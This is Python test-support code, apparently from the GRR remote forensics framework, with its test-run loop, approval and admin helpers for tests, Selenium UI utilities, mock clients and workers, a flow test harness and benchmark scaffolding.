if result is None: result = self.defaultTestResult()
result.startTest(self)
testMethod = getattr(self, self._testMethodName) # pylint: disable=g-bad-name
try:
try:
self.setUp()
except:
# Break into interactive debugger on test failure.
if flags.FLAGS.debug:
pdb.post_mortem()
result.addError(self, sys.exc_info())
# If the setup step failed we stop the entire test suite
# immediately. This helps catch errors in the setUp() function.
raise
ok = False
try:
testMethod()
ok = True
except self.failureException:
# Break into interactive debugger on test failure.
if flags.FLAGS.debug:
pdb.post_mortem()
result.addFailure(self, sys.exc_info())
except KeyboardInterrupt:
raise
except Exception:
# Break into interactive debugger on test failure.
if flags.FLAGS.debug:
pdb.post_mortem()
result.addError(self, sys.exc_info())
try:
self.tearDown()
except KeyboardInterrupt:
raise
except Exception:
# Break into interactive debugger on test failure.
if flags.FLAGS.debug:
pdb.post_mortem()
result.addError(self, sys.exc_info())
ok = False
if ok:
result.addSuccess(self)
finally:
result.stopTest(self)
def MakeUserAdmin(self, username):
"""Makes the test user an admin."""
with aff4.FACTORY.Create("aff4:/users/%s" % username, "GRRUser",
token=self.token.SetUID()) as user:
user.SetLabels("admin")
def GrantClientApproval(self, client_id, token=None):
token = token or self.token
# Create the approval and approve it.
flow.GRRFlow.StartFlow(client_id=client_id,
flow_name="RequestClientApprovalFlow",
reason=token.reason,
subject_urn=rdfvalue.ClientURN(client_id),
approver="approver",
token=token)
self.MakeUserAdmin("approver")
approver_token = access_control.ACLToken(username="approver")
flow.GRRFlow.StartFlow(client_id=client_id,
flow_name="GrantClientApprovalFlow",
reason=token.reason,
delegate=token.username,
subject_urn=rdfvalue.ClientURN(client_id),
token=approver_token)
def GrantHuntApproval(self, hunt_urn, token=None):
token = token or self.token
# Create the approval and approve it.
flow.GRRFlow.StartFlow(flow_name="RequestHuntApprovalFlow",
subject_urn=rdfvalue.RDFURN(hunt_urn),
reason=token.reason,
approver="approver",
token=token)
self.MakeUserAdmin("approver")
approver_token = access_control.ACLToken(username="approver")
flow.GRRFlow.StartFlow(flow_name="GrantHuntApprovalFlow",
subject_urn=rdfvalue.RDFURN(hunt_urn),
reason=token.reason,
delegate=token.username,
token=approver_token)
def GrantCronJobApproval(self, cron_job_urn, token=None):
token = token or self.token
# Create cron job approval and approve it.
flow.GRRFlow.StartFlow(flow_name="RequestCronJobApprovalFlow",
subject_urn=rdfvalue.RDFURN(cron_job_urn),
reason=self.token.reason,
approver="approver",
token=token)
self.MakeUserAdmin("approver")
approver_token = access_control.ACLToken(username="approver")
flow.GRRFlow.StartFlow(flow_name="GrantCronJobApprovalFlow",
subject_urn=rdfvalue.RDFURN(cron_job_urn),
reason=token.reason,
delegate=token.username,
token=approver_token)
def SetupClients(self, nr_clients):
client_ids = []
for i in range(nr_clients):
client_id = rdfvalue.ClientURN("C.1%015d" % i)
client_ids.append(client_id)
fd = aff4.FACTORY.Create(client_id, "VFSGRRClient", token=self.token)
cert = rdfvalue.RDFX509Cert(
self.ClientCertFromPrivateKey(
config_lib.CONFIG["Client.private_key"]).as_pem())
fd.Set(fd.Schema.CERT, cert)
info = fd.Schema.CLIENT_INFO()
info.client_name = "GRR Monitor"
fd.Set(fd.Schema.CLIENT_INFO, info)
fd.Set(fd.Schema.PING, rdfvalue.RDFDatetime().Now())
fd.Set(fd.Schema.HOSTNAME("Host-%s" % i))
fd.Set(fd.Schema.FQDN("Host-%s.example.com" % i))
fd.Set(fd.Schema.MAC_ADDRESS("aabbccddee%02x" % i))
fd.Close()
return client_ids
def DeleteClients(self, nr_clients):
for i in range(nr_clients):
client_id = rdfvalue.ClientURN("C.1%015d" % i)
data_store.DB.DeleteSubject(client_id, token=self.token)
def RunForTimeWithNoExceptions(self, cmd, argv, timeout=10, should_exit=False,
check_exit_code=False):
"""Run a command line argument and check for python exceptions raised.
Args:
cmd: The command to run as a string.
argv: The args.
timeout: How long to let the command run before terminating.
should_exit: If True we will raise if the command hasn't exited after
the specified timeout.
check_exit_code: If True and should_exit is True, we'll check that the
exit code was 0 and raise if it isn't.
Raises:
RuntimeError: On any errors.
"""
def HandleTimeout(unused_signum, unused_frame):
raise TimeoutError()
exited = False
try:
logging.info("Running : %s", [cmd] + argv)
proc = subprocess.Popen([cmd] + argv, stdout=subprocess.PIPE,
stderr=subprocess.STDOUT, bufsize=1)
signal.signal(signal.SIGALRM, HandleTimeout)
signal.alarm(timeout)
stdout = StringIO.StringIO()
while True:
proc.poll()
# Iterate through the output so that we get the output data even if we
# kill the process.
for line in proc.stdout.readline():
stdout.write(line)
if proc.returncode is not None:
exited = True
break
except TimeoutError:
pass # We expect timeouts.
finally:
signal.alarm(0)
try:
proc.kill()
except OSError:
pass # Could already be dead.
proc.stdout.flush()
stdout.write(proc.stdout.read()) # Collect any remaining output.
if "Traceback (" in stdout.getvalue():
raise RuntimeError("Exception found in stderr of binary Stderr:\n###\n%s"
"###\nCmd: %s" % (stdout.getvalue(), cmd))
if should_exit and not exited:
raise RuntimeError("Bin: %s got timeout when when executing, expected "
"exit. \n%s\n" % (stdout.getvalue(), cmd))
if not should_exit and exited:
raise RuntimeError("Bin: %s exited, but should have stayed running.\n%s\n"
% (stdout.getvalue(), cmd))
if should_exit and check_exit_code:
if proc.returncode != 0:
raise RuntimeError("Bin: %s should have returned exit code 0 but got "
"%s" % (cmd, proc.returncode))
def ClientCertFromPrivateKey(self, private_key):
communicator = comms.ClientCommunicator(private_key=private_key)
csr = communicator.GetCSR()
request = X509.load_request_string(csr)
flow_obj = aff4.FACTORY.Create(None, "CAEnroler", token=self.token)
subject = request.get_subject()
cn = rdfvalue.ClientURN(subject.as_text().split("=")[-1])
return flow_obj.MakeCert(cn, request)
def CreateSignedDriver(self):
client_context = ["Platform:Windows", "Arch:amd64"]
# Make sure there is a signed driver for our client.
driver_path = maintenance_utils.UploadSignedDriverBlob(
"MZ Driveeerrrrrr", client_context=client_context,
token=self.token)
logging.info("Wrote signed driver to %s", driver_path)
class EmptyActionTest(GRRBaseTest):
"""Test the client Actions."""
__metaclass__ = registry.MetaclassRegistry
def RunAction(self, action_name, arg=None):
"""Run an action and generate responses.
Args:
action_name: The action to run.
arg: A protobuf to pass the action.
Returns:
A list of response protobufs.
"""
if arg is None:
arg = rdfvalue.GrrMessage()
message = rdfvalue.GrrMessage(name=action_name,
payload=arg)
action_cls = actions.ActionPlugin.classes[message.name]
results = []
# Monkey patch a mock SendReply() method
def MockSendReply(self, reply=None, **kwargs):
if reply is None:
reply = self.out_rdfvalue(**kwargs)
results.append(reply)
old_sendreply = action_cls.SendReply
try:
action_cls.SendReply = MockSendReply
action = action_cls(message=message)
action.grr_worker = FakeClientWorker()
action.Run(arg)
finally:
action_cls.SendReply = old_sendreply
return results
class FlowTestsBaseclass(GRRBaseTest):
"""The base class for all flow tests."""
__metaclass__ = registry.MetaclassRegistry
def setUp(self):
GRRBaseTest.setUp(self)
client_ids = self.SetupClients(1)
self.client_id = client_ids[0]
def tearDown(self):
super(FlowTestsBaseclass, self).tearDown()
data_store.DB.Clear()
def FlowSetup(self, name):
session_id = flow.GRRFlow.StartFlow(client_id=self.client_id,
flow_name=name, token=self.token)
return aff4.FACTORY.Open(session_id, mode="rw", token=self.token)
def SeleniumAction(f):
"""Decorator to do multiple attempts in case of WebDriverException."""
@functools.wraps(f)
def Decorator(*args, **kwargs):
delay = 0.2
num_attempts = 15
cur_attempt = 0
while True:
try:
return f(*args, **kwargs)
except exceptions.WebDriverException as e:
logging.warn("Selenium raised %s", utils.SmartUnicode(e))
cur_attempt += 1
if cur_attempt == num_attempts:
raise
time.sleep(delay)
return Decorator
class ACLChecksDisabledContextManager(object):
def __enter__(self):
self.old_security_manager = data_store.DB.security_manager
data_store.DB.security_manager = access_control.NullAccessControlManager()
return None
def __exit__(self, unused_type, unused_value, unused_traceback):
data_store.DB.security_manager = self.old_security_manager
class Stubber(object):
"""A context manager for doing simple stubs."""
def __init__(self, module, target_name, stub):
self.target_name = target_name
self.module = module
self.stub = stub
def __enter__(self):
self.old_target = getattr(self.module, self.target_name, None)
try:
self.stub.old_target = self.old_target
except AttributeError:
pass
setattr(self.module, self.target_name, self.stub)
def __exit__(self, unused_type, unused_value, unused_traceback):
setattr(self.module, self.target_name, self.old_target)
class MultiStubber(object):
"""A context manager for doing simple stubs."""
def __init__(self, *args):
self.stubbers = [Stubber(*x) for x in args]
def __enter__(self):
for x in self.stubbers:
x.__enter__()
def __exit__(self, t, value, traceback):
for x in self.stubbers:
x.__exit__(t, value, traceback)
class Instrument(object):
"""A helper to instrument a function call.
Stores a copy of all function call args locally for later inspection.
"""
def __init__(self, module, target_name):
self.old_target = getattr(module, target_name)
def Wrapper(*args, **kwargs):
self.args.append(args)
self.kwargs.append(kwargs)
return self.old_target(*args, **kwargs)
self.stubber = Stubber(module, target_name, Wrapper)
self.args = []
self.kwargs = []
def __enter__(self):
self.stubber.__enter__()
return self
def __exit__(self, t, value, traceback):
return self.stubber.__exit__(t, value, traceback)
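# Added illustration (not part of the original module): typical Stubber and
# Instrument usage. time.time and time.sleep are only convenient stand-in
# targets here, not what the real tests stub.
def ExampleStubAndInstrument():
  with Stubber(time, "time", lambda: 42):
    assert time.time() == 42
  with Instrument(time, "sleep") as instrumented:
    time.sleep(0)
  assert instrumented.args == [(0,)]
  assert instrumented.kwargs == [{}]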
class GRRSeleniumTest(GRRBaseTest):
"""Baseclass for selenium UI tests."""
# Default duration (in seconds) for WaitUntil.
duration = 5
# Time to wait between polls for WaitUntil.
sleep_time = 0.2
# This is the global selenium handle.
driver = None
# Base url of the Admin UI
base_url = None
# Whether InstallACLChecks() was called during the test
acl_checks_installed = False
def InstallACLChecks(self):
"""Installs AccessControlManager and stubs out SendEmail."""
if self.acl_checks_installed:
return
self.old_security_manager = data_store.DB.security_manager
data_store.DB.security_manager = access_control.FullAccessControlManager()
# Stub out the email function
self.old_send_email = email_alerts.SendEmail
self.emails_sent = []
def SendEmailStub(from_user, to_user, subject, message, **unused_kwargs):
self.emails_sent.append((from_user, to_user, subject, message))
email_alerts.SendEmail = SendEmailStub
self.acl_checks_installed = True
def UninstallACLChecks(self):
"""Deinstall previously installed ACL checks."""
if not self.acl_checks_installed:
return
data_store.DB.security_manager = self.old_security_manager
email_alerts.SendEmail = self.old_send_email
self.acl_checks_installed = False
def ACLChecksDisabled(self):
return ACLChecksDisabledContextManager()
def WaitUntil(self, condition_cb, *args):
for _ in range(int(self.duration / self.sleep_time)):
try:
res = condition_cb(*args)
if res:
return res
# The element might not exist yet and selenium could raise here. (Also
# Selenium raises Exception not StandardError).
except Exception as e: # pylint: disable=broad-except
logging.warn("Selenium raised %s", utils.SmartUnicode(e))
time.sleep(self.sleep_time)
raise RuntimeError("condition not met, body is: %s" %
self.driver.find_element_by_tag_name("body").text)
def ClickUntil(self, target, condition_cb, *args):
for _ in range(int(self.duration / self.sleep_time)):
try:
res = condition_cb(*args)
if res:
return res
# The element might not exist yet and selenium could raise here. (Also
# Selenium raises Exception not StandardError).
except Exception as e: # pylint: disable=broad-except
logging.warn("Selenium raised %s", utils.SmartUnicode(e))
element = self.GetElement(target)
if element:
try:
element.click()
except exceptions.WebDriverException:
pass
time.sleep(self.sleep_time)
raise RuntimeError("condition not met, body is: %s" %
self.driver.find_element_by_tag_name("body").text)
def _FindElement(self, selector):
try:
selector_type, effective_selector = selector.split("=", 1)
except ValueError:
effective_selector = selector
selector_type = None
if selector_type == "css":
elems = self.driver.execute_script(
"return $(\"" + effective_selector.replace("\"", "\\\"") + "\");")
if not elems:
raise exceptions.NoSuchElementException()
else:
return elems[0]
elif selector_type == "link":
links = self.driver.find_elements_by_partial_link_text(effective_selector)
for l in links:
if l.text.strip() == effective_selector:
return l
raise exceptions.NoSuchElementException()
elif selector_type == "xpath":
return self.driver.find_element_by_xpath(effective_selector)
elif selector_type == "id":
return self.driver.find_element_by_id(effective_selector)
elif selector_type == "name":
return self.driver.find_element_by_name(effective_selector)
elif selector_type is None:
if effective_selector.startswith("//"):
return self.driver.find_element_by_xpath(effective_selector)
else:
return self.driver.find_element_by_id(effective_selector)
else:
raise RuntimeError("unknown selector type %s" % selector_type)
@SeleniumAction
def Open(self, url):
self.driver.get(self.base_url + url)
def WaitUntilNot(self, condition_cb, *args):
self.WaitUntil(lambda: not condition_cb(*args))
def IsElementPresent(self, target):
try:
self._FindElement(target)
return True
except exceptions.NoSuchElementException:
return False
def GetElement(self, target):
try:
return self._FindElement(target)
except exceptions.NoSuchElementException:
return None
def GetVisibleElement(self, target):
try:
element = self._FindElement(target)
if element.is_displayed():
return element
except exceptions.NoSuchElementException:
pass
return None
def IsTextPresent(self, text):
return self.AllTextsPresent([text])
def AllTextsPresent(self, texts):
body = self.driver.find_element_by_tag_name("body").text
for text in texts:
if utils.SmartUnicode(text) not in body:
return False
return True
def IsVisible(self, target):
element = self.GetElement(target)
return element and element.is_displayed()
def GetText(self, target):
element = self.WaitUntil(self.GetVisibleElement, target)
return element.text.strip()
def GetValue(self, target):
return self.GetAttribute(target, "value")
def GetAttribute(self, target, attribute):
element = self.WaitUntil(self.GetVisibleElement, target)
return element.get_attribute(attribute)
def WaitForAjaxCompleted(self):
self.WaitUntilEqual("", self.GetAttribute,
"css=[id=ajax_spinner]", "innerHTML")
@SeleniumAction
def Type(self, target, text, end_with_enter=False):
element = self.WaitUntil(self.GetVisibleElement, target)
element.clear()
element.send_keys(text)
if end_with_enter:
element.send_keys(keys.Keys.ENTER)
# We experienced that Selenium sometimes swallows the last character of the
# text sent. Raising an exception here will just retry in that case.
if not end_with_enter:
if text != self.GetValue(target):
raise exceptions.WebDriverException("Send_keys did not work correctly.")
@SeleniumAction
def Click(self, target):
# Selenium clicks elements by obtaining their position and then issuing a
# click action in the middle of this area. This may lead to misclicks when
# elements are moving. Make sure that they are stationary before issuing
# the click action (specifically, using the bootstrap "fade" class that
# slides dialogs in is highly discouraged in combination with .Click()).
self.WaitForAjaxCompleted()
element = self.WaitUntil(self.GetVisibleElement, target)
element.click()
def ClickUntilNotVisible(self, target):
self.WaitUntil(self.GetVisibleElement, target)
self.ClickUntil(target, lambda x: not self.IsVisible(x), target)
@SeleniumAction
def Select(self, target, label):
element = self.WaitUntil(self.GetVisibleElement, target)
select.Select(element).select_by_visible_text(label)
def GetSelectedLabel(self, target):
element = self.WaitUntil(self.GetVisibleElement, target)
return select.Select(element).first_selected_option.text.strip()
def IsChecked(self, target):
return self.WaitUntil(self.GetVisibleElement, target).is_selected()
def GetCssCount(self, target):
if not target.startswith("css="):
raise ValueError("invalid target for GetCssCount: " + target)
return len(self.driver.find_elements_by_css_selector(target[4:]))
def WaitUntilEqual(self, target, condition_cb, *args):
for _ in range(int(self.duration / self.sleep_time)):
try:
if condition_cb(*args) == target:
return True
# The element might not exist yet and selenium could raise here. (Also
# Selenium raises Exception not StandardError).
except Exception as e: # pylint: disable=broad-except
logging.warn("Selenium raised %s", utils.SmartUnicode(e))
time.sleep(self.sleep_time)
raise RuntimeError("condition not met, body is: %s" %
self.driver.find_element_by_tag_name("body").text)
def WaitUntilContains(self, target, condition_cb, *args):
data = ""
target = utils.SmartUnicode(target)
for _ in range(int(self.duration / self.sleep_time)):
try:
data = condition_cb(*args)
if target in data:
return True
# The element might not exist yet and selenium could raise here.
except Exception as e: # pylint: disable=broad-except
logging.warn("Selenium raised %s", utils.SmartUnicode(e))
time.sleep(self.sleep_time)
raise RuntimeError("condition not met. Got %r" % data)
def setUp(self):
super(GRRSeleniumTest, self).setUp()
# Make the user use the advanced gui so we can test it.
with aff4.FACTORY.Create(
aff4.ROOT_URN.Add("users/test"), aff4_type="GRRUser", mode="w",
token=self.token) as user_fd:
user_fd.Set(user_fd.Schema.GUI_SETTINGS(mode="ADVANCED"))
self.InstallACLChecks()
def tearDown(self):
self.UninstallACLChecks()
super(GRRSeleniumTest, self).tearDown()
class AFF4ObjectTest(GRRBaseTest):
"""The base class of all aff4 object tests."""
__metaclass__ = registry.MetaclassRegistry
client_id = rdfvalue.ClientURN("C." + "B" * 16)
class MicroBenchmarks(GRRBaseTest):
"""This base class created the GRR benchmarks."""
__metaclass__ = registry.MetaclassRegistry
# Increase this for more accurate timing information.
REPEATS = 1000
units = "us"
def setUp(self):
super(MicroBenchmarks, self).setUp()
# We use this to store temporary benchmark results.
self.benchmark_scratchpad = [
["Benchmark", "Time (%s)", "Iterations"],
["---------", "---------", "----------"]]
def tearDown(self):
f = 1
if self.units == "us":
f = 1e6
elif self.units == "ms":
f = 1e3
if len(self.benchmark_scratchpad) > 2:
print "\nRunning benchmark %s: %s" % (self._testMethodName,
self._testMethodDoc or "")
for row in self.benchmark_scratchpad:
if isinstance(row[1], (int, float)):
row[1] = "%10.4f" % (row[1] * f)
elif "%" in row[1]:
row[1] %= self.units
if len(row) == 4 and isinstance(row[-1], (basestring, int, float)):
print "{0:45} {1:<20} {2:<20} ({3})".format(*row)
else:
print "{0:45} {1:<20} {2:<20}".format(*row)
print
def TimeIt(self, callback, name=None, repetitions=None, pre=None, **kwargs):
"""Runs the callback repetitively and returns the average time."""
if repetitions is None:
repetitions = self.REPEATS
if name is None:
name = callback.__name__
if pre is not None:
pre()
start = time.time()
for _ in xrange(repetitions):
v = callback(**kwargs)
time_taken = (time.time() - start)/repetitions
self.AddResult(name, time_taken, repetitions, v)
def AddResult(self, name, time_taken, repetitions, v=None):
self.benchmark_scratchpad.append(
[name, time_taken, repetitions, v])
class GRRTestLoader(unittest.TestLoader):
"""A test suite loader which searches for tests in all the plugins."""
# This should be overridden by derived classes. We load all tests extending
# this class.
base_class = None
def __init__(self, labels=None):
super(GRRTestLoader, self).__init__()
if labels is None:
labels = set(flags.FLAGS.labels)
self.labels = set(labels)
def getTestCaseNames(self, testCaseClass):
"""Filter the test methods according to the labels they have."""
result = []
for test_name in super(GRRTestLoader, self).getTestCaseNames(testCaseClass):
test_method = getattr(testCaseClass, test_name)
# If the method is not tagged, it will be labeled "small".
test_labels = getattr(test_method, "labels", set(["small"]))
if self.labels and not self.labels.intersection(test_labels):
continue
result.append(test_name)
return result
def loadTestsFromModule(self, _):
"""Just return all the tests as if they were in the same module."""
test_cases = [
self.loadTestsFromTestCase(x) for x in self.base_class.classes.values()
if issubclass(x, self.base_class)]
return self.suiteClass(test_cases)
def loadTestsFromName(self, name, module=None):
"""Load the tests named."""
parts = name.split(".")
try:
test_cases = self.loadTestsFromTestCase(self.base_class.classes[parts[0]])
except KeyError:
raise RuntimeError("Unable to find test %r - is it registered?" % name)
# Specifies the whole test suite.
if len(parts) == 1:
return self.suiteClass(test_cases)
elif len(parts) == 2:
cls = self.base_class.classes[parts[0]]
return unittest.TestSuite([cls(parts[1])])
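# Added illustration (not part of the original module): GRRTestLoader filters on
# a `labels` attribute attached to test methods. A decorator along these lines
# is one hypothetical way to attach such labels.
def ExampleSetLabel(*labels):
  """Tags the decorated test method with the given labels."""
  def Decorator(f):
    f.labels = set(labels)
    return f
  return Decorator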
class MockClient(object):
def __init__(self, client_id, client_mock, token=None):
if not isinstance(client_id, rdfvalue.ClientURN):
raise RuntimeError("Client id must be an instance of ClientURN")
if client_mock is None:
client_mock = InvalidActionMock()
self.client_id = client_id
self.client_mock = client_mock
self.token = token
# Well known flows are run on the front end.
self.well_known_flows = flow.WellKnownFlow.GetAllWellKnownFlows(token=token)
def PushToStateQueue(self, message, **kw):
# Assume the client is authorized
message.auth_state = rdfvalue.GrrMessage.AuthorizationState.AUTHENTICATED
# Update kw args
for k, v in kw.items():
setattr(message, k, v)
# Handle well known flows
if message.request_id == 0:
# Well known flows only accept messages of type MESSAGE.
if message.type == rdfvalue.GrrMessage.Type.MESSAGE:
# Assume the message is authenticated and comes from this client.
message.SetWireFormat(
"source", utils.SmartStr(self.client_id.Basename()))
message.auth_state = "AUTHENTICATED"
session_id = message.session_id
logging.info("Running well known flow: %s", session_id)
self.well_known_flows[str(session_id)].ProcessMessage(message)
return
with queue_manager.QueueManager(token=self.token) as manager:
manager.QueueResponse(message.session_id, message)
def Next(self):
# Grab tasks for us from the queue.
with queue_manager.QueueManager(token=self.token) as manager:
request_tasks = manager.QueryAndOwn(self.client_id.Queue(),
limit=1,
lease_seconds=10000)
for message in request_tasks:
response_id = 1
# Collect all responses for this message from the client mock
try:
if hasattr(self.client_mock, "HandleMessage"):
responses = self.client_mock.HandleMessage(message)
else:
responses = getattr(self.client_mock, message.name)(message.payload)
if not responses:
responses = []
logging.info("Called client action %s generating %s responses",
message.name, len(responses) + 1)
status = rdfvalue.GrrStatus()
except Exception as e: # pylint: disable=broad-except
logging.exception("Error %s occurred in client", e)
# Error occurred.
responses = []
status = rdfvalue.GrrStatus(
status=rdfvalue.GrrStatus.ReturnedStatus.GENERIC_ERROR)
# Now insert those on the flow state queue
for response in responses:
if isinstance(response, rdfvalue.GrrStatus):
msg_type = rdfvalue.GrrMessage.Type.STATUS
response = rdfvalue.GrrMessage(
session_id=message.session_id, name=message.name,
response_id=response_id, request_id=message.request_id,
payload=response,
type=msg_type)
elif not isinstance(response, rdfvalue.GrrMessage):
msg_type = rdfvalue.GrrMessage.Type.MESSAGE
response = rdfvalue.GrrMessage(
session_id=message.session_id, name=message.name,
response_id=response_id, request_id=message.request_id,
payload=response,
type=msg_type)
# Next expected response
response_id = response.response_id + 1
self.PushToStateQueue(response)
# Add a Status message to the end
self.PushToStateQueue(message, response_id=response_id,
payload=status,
type=rdfvalue.GrrMessage.Type.STATUS)
# Additionally schedule a task for the worker
manager.NotifyQueue(message.session_id,
priority=message.priority)
return len(request_tasks)
class MockThreadPool(object):
"""A mock thread pool which runs all jobs serially."""
def __init__(self, *_):
pass
def AddTask(self, target, args, name="Unnamed task"):
_ = name
try:
target(*args)
# The real threadpool can not raise from a task. We emulate this here.
except Exception as e: # pylint: disable=broad-except
logging.exception("Thread worker raised %s", e)
def Join(self):
pass
class MockWorker(worker.GRRWorker):
"""Mock the worker."""
# Resource accounting off by default, set these arrays to emulate CPU and
# network usage.
USER_CPU = [0]
SYSTEM_CPU = [0]
NETWORK_BYTES = [0]
def __init__(self, queue=worker.DEFAULT_WORKER_QUEUE,
check_flow_errors=True, token=None):
self.queue = queue
self.check_flow_errors = check_flow_errors
self.token = token
self.pool = MockThreadPool("MockWorker_pool", 25)
# Collect all the well known flows.
self.well_known_flows = flow.WellKnownFlow.GetAllWellKnownFlows(token=token)
# Simple generators to emulate CPU and network usage
self.cpu_user = itertools.cycle(self.USER_CPU)
self.cpu_system = itertools.cycle(self.SYSTEM_CPU)
self.network_bytes = itertools.cycle(self.NETWORK_BYTES)
def Simulate(self):
while self.Next():
pass
self.pool.Join()
def Next(self):
"""Very simple emulator of the worker.
We wake each flow in turn and run it.
Returns:
      The list of session ids for the flows that were run.
Raises:
RuntimeError: if the flow terminates with an error.
"""
with queue_manager.QueueManager(token=self.token) as manager:
sessions_available = manager.GetSessionsFromQueue(self.queue)
sessions_available = [rdfvalue.SessionID(session_id)
for session_id in sessions_available]
# Run all the flows until they are finished
run_sessions = []
      # Only sample one session at a time to force serialization of flows
# after each state run - this helps to catch unpickleable objects.
for session_id in sessions_available[:1]:
manager.DeleteNotification(session_id)
run_sessions.append(session_id)
# Handle well known flows here.
if session_id in self.well_known_flows:
self.well_known_flows[session_id].ProcessRequests(
self.pool)
continue
with aff4.FACTORY.OpenWithLock(
session_id, token=self.token, blocking=False) as flow_obj:
# Run it
with flow_obj.GetRunner() as runner:
cpu_used = runner.context.client_resources.cpu_usage
user_cpu = self.cpu_user.next()
system_cpu = self.cpu_system.next()
network_bytes = self.network_bytes.next()
cpu_used.user_cpu_time += user_cpu
cpu_used.system_cpu_time += system_cpu
runner.context.network_bytes_sent += network_bytes
runner.ProcessCompletedRequests(self.pool)
if (self.check_flow_errors and
runner.context.state == rdfvalue.Flow.State.ERROR):
logging.exception("Flow terminated in state %s with an error: %s",
runner.context.current_state,
runner.context.backtrace)
raise RuntimeError(runner.context.backtrace)
return run_sessions
class FakeClientWorker(comms.GRRClientWorker):
"""A Fake GRR client worker which just collects SendReplys."""
def __init__(self):
self.responses = []
self.sent_bytes_per_flow = {}
self.lock = threading.RLock()
self.stats_collector = client_stats.ClientStatsCollector(self)
def __del__(self):
pass
def SendReply(self, rdf_value,
message_type=rdfvalue.GrrMessage.Type.MESSAGE, **kw):
message = rdfvalue.GrrMessage(
type=message_type, payload=rdf_value, **kw)
self.responses.append(message)
class ActionMock(object):
"""A client mock which runs a real action.
This can be used as input for TestFlowHelper.
  It is possible to mix mocked actions with real actions. Simply extend this
  class and add methods for the mocked actions, while instantiating with the
  list of real actions to run:
class MixedActionMock(ActionMock):
def __init__(self):
super(MixedActionMock, self).__init__("RealAction")
def MockedAction(self, args):
return []
  This will run the real action "RealAction" at the same time as the mocked
  action MockedAction.
"""
def __init__(self, *action_names):
self.action_names = action_names
self.action_classes = dict(
[(k, v) for (k, v) in actions.ActionPlugin.classes.items()
if k in action_names])
self.action_counts = dict((x, 0) for x in action_names)
def HandleMessage(self, message):
message.auth_state = rdfvalue.GrrMessage.AuthorizationState.AUTHENTICATED
client_worker = FakeClientWorker()
# We allow special methods to be specified for certain actions.
if hasattr(self, message.name):
return getattr(self, message.name)(message.payload)
action_cls = self.action_classes[message.name]
action = action_cls(message=message, grr_worker=client_worker)
action.Execute()
self.action_counts[message.name] += 1
return client_worker.responses
class InvalidActionMock(object):
"""An action mock which raises for all actions."""
def HandleMessage(self, unused_message):
raise RuntimeError("Invalid Action Mock.")
class Test(actions.ActionPlugin):
"""A test action which can be used in mocks."""
in_rdfvalue = rdfvalue.DataBlob
out_rdfvalue = rdfvalue.DataBlob
def CheckFlowErrors(total_flows, token=None):
# Check that all the flows are complete.
for session_id in total_flows:
try:
flow_obj = aff4.FACTORY.Open(session_id, aff4_type="GRRFlow", mode="r",
token=token)
except IOError:
continue
if flow_obj.state.context.state != rdfvalue.Flow.State.TERMINATED:
if flags.FLAGS.debug:
pdb.set_trace()
raise RuntimeError("Flow %s completed in state %s" % (
flow_obj.state.context.args.flow_name,
flow_obj.state.context.state))
def TestFlowHelper(flow_urn_or_cls_name, client_mock=None, client_id=None,
check_flow_errors=True, token=None, notification_event=None,
sync=True, **kwargs):
"""Build a full test harness: client - worker + start flow.
Args:
flow_urn_or_cls_name: RDFURN pointing to existing flow (in this case the
given flow will be run) or flow class name (in this
case flow of the given class will be created and run).
client_mock: Client mock object.
client_id: Client id of an emulated client.
check_flow_errors: If True, TestFlowHelper will raise on errors during flow
execution.
token: Security token.
notification_event: A well known flow session_id of an event listener. Event
will be published once the flow finishes.
sync: Whether StartFlow call should be synchronous or not.
**kwargs: Arbitrary args that will be passed to flow.GRRFlow.StartFlow().
Yields:
The caller should iterate over the generator to get all the flows
and subflows executed.
"""
if client_id or client_mock:
client_mock = MockClient(client_id, client_mock, token=token)
worker_mock = MockWorker(check_flow_errors=check_flow_errors, token=token)
if isinstance(flow_urn_or_cls_name, rdfvalue.RDFURN):
session_id = flow_urn_or_cls_name
else:
# Instantiate the flow:
session_id = flow.GRRFlow.StartFlow(
client_id=client_id, flow_name=flow_urn_or_cls_name,
notification_event=notification_event, sync=sync,
token=token, **kwargs)
total_flows = set()
total_flows.add(session_id)
# Run the client and worker until nothing changes any more.
while True:
if client_mock:
client_processed = client_mock.Next()
else:
client_processed = 0
flows_run = []
for flow_run in worker_mock.Next():
total_flows.add(flow_run)
flows_run.append(flow_run)
if client_processed == 0 and not flows_run:
break
yield session_id
# We should check for flow errors:
if check_flow_errors:
CheckFlowErrors(total_flows, token=token)
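# Hedged usage sketch (not part of the original module): "ExampleFlow" and
# "ListDirectory" are placeholder names picked for illustration. The point is
# the pattern of draining the TestFlowHelper generator so that every flow and
# subflow state actually gets executed, with CheckFlowErrors run at the end.
def _ExampleTestFlowHelperUsage(client_id, token):
  """Illustrative only: run one flow end to end against a mocked client."""
  # client_id must be an rdfvalue.ClientURN instance (MockClient enforces it).
  client_mock = ActionMock("ListDirectory")
  for _ in TestFlowHelper("ExampleFlow", client_mock, client_id=client_id,
                          check_flow_errors=True, token=token):
    pass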
class CrashClientMock(object):
def __init__(self, client_id, token):
self.client_id = client_id
self.token = token
def HandleMessage(self, message):
status = rdfvalue.GrrStatus(
status=rdfvalue.GrrStatus.ReturnedStatus.CLIENT_KILLED,
error_message="Client killed during transaction")
msg = rdfvalue.GrrMessage(
request_id=message.request_id, response_id=1,
session_id=message.session_id,
type=rdfvalue.GrrMessage.Type.STATUS,
payload=status,
auth_state=rdfvalue.GrrMessage.AuthorizationState.AUTHENTICATED)
msg.SetWireFormat("source", utils.SmartStr(self.client_id.Basename()))
self.flow_id = message.session_id
# This is normally done by the FrontEnd when a CLIENT_KILLED message is
# received.
flow.Events.PublishEvent("ClientCrash", msg, token=self.token)
return [status]
class MemoryClientMock(ActionMock):
"""A mock of client state including memory actions."""
def InstallDriver(self, _):
return []
def UninstallDriver(self, _):
return []
def GetMemoryInformation(self, _):
reply = rdfvalue.MemoryInformation(
device=rdfvalue.PathSpec(
path=r"\\.\pmem",
pathtype=rdfvalue.PathSpec.PathType.MEMORY))
reply.runs.Append(offset=0x1000, length=0x10000)
reply.runs.Append(offset=0x20000, length=0x10000)
return [reply]
class SampleHuntMock(object):
def __init__(self, failrate=2, data="Hello World!"):
self.responses = 0
self.data = data
self.failrate = failrate
self.count = 0
def StatFile(self, args):
return self._StatFile(args)
def _StatFile(self, args):
req = rdfvalue.ListDirRequest(args)
response = rdfvalue.StatEntry(
pathspec=req.pathspec,
st_mode=33184,
st_ino=1063090,
st_dev=64512L,
st_nlink=1,
st_uid=139592,
st_gid=5000,
st_size=len(self.data),
st_atime=1336469177,
st_mtime=1336129892,
st_ctime=1336129892)
self.responses += 1
self.count += 1
# Create status message to report sample resource usage
